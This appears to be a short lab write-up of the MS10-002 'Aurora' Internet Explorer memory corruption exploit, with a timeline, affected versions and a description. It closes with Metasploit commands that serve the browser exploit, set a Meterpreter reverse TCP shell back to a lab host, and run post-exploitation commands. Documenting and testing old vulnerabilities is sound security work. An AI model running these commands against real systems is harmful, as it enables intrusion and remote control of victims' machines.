MS10-002 : Internet Explorer Aurora Memory Corruption

Timeline :

Microsoft learned of the vulnerability on 2010-01-13
Metasploit PoC provided by hdm on 2010-01-15
Exploit-DB PoC provided by Ahmed Obied on 2010-01-17
Microsoft patch “KB978207” released on 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that led to the compromise of a number of high-profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig